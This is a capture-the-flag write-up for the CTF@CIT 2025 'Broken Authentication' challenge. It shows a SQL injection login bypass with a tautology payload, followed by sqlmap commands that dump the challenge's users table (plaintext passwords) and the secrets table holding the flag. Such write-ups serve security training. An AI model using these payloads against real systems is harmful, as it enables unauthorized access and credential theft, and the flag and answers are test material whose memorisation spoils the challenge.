
SQL Injection Auth Bypass and Database Dump – CTF@CIT 2025: Broken Authentication

TL;DR

  • Login form is vulnerable to classic SQL injection.
  • Authentication is bypassed with a tautology payload.
  • SQL injection allows full database enumeration.
  • Flag is stored in a separate secrets table and dumped directly.

Video Walkthrough

SQL injection authentication bypass and database enumeration – CTF@CIT 2025 Broken Authentication

Description

Say my username.

Solution

Part 1: SQL Injection (Auth Bypass)

A basic login page. When we submit '' as the username, it returns the following error.

Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1 in /var/www/html/index.php:23
Stack trace:
#0 /var/www/html/index.php(23): mysqli->query('SELECT * FROM u...')
#1 {main}
  thrown in /var/www/html/index.php

Submitting ' or '1'='1 as both the username and password bypasses the login panel: the leading quote closes the string literal and the or '1'='1 tautology makes the WHERE clause always true.

Part 2: SQLi (DB Enumeration)

The admin panel says "As you can probably tell, this page is currently under construction."

We checked the source, cookies, technologies etc., but there doesn't appear to be anything of use. Perhaps the flag is in the username/password and we need to return to the SQLi.

sqlmap -u http://23.179.17.40:58001/index.php --data "username=cat&password=meow&login=Login" --batch

It finds the SQLi, so we dump the creds:

sqlmap -u http://23.179.17.40:58001/index.php --data "username=cat&password=meow&login=Login" --batch -T users --dump

+---------+----------+--------------+----------+
| email   | fullname | password     | username |
+---------+----------+--------------+----------+
| <blank> | <blank>  | m1n3r41s     | hank     |
| <blank> | <blank>  | 9f3IC3uj9^zZ | admin    |
| <blank> | <blank>  | M4GN375      | jesse    |
| <blank> | <blank>  | b4byb1u3     | walter   |
+---------+----------+--------------+----------+

We tried logging in with each account in case the admin UI changed, but it did not.

Let's see if there are any other tables.

sqlmap -u http://23.179.17.40:58001/index.php --data "username=cat&password=meow&login=Login" --batch -D app --tables

+---------+
| secrets |
| users   |
+---------+

Nice! secrets sounds pretty promising 👀

sqlmap -u http://23.179.17.40:58001/index.php --data "username=cat&password=meow&login=Login" --batch -T secrets --dump

+--------+-----------------------+
| name   | value                 |
+--------+-----------------------+
| flag   | CIT{36b0efd6c2ec7132} |
+--------+-----------------------+

Flag: CIT{36b0efd6c2ec7132}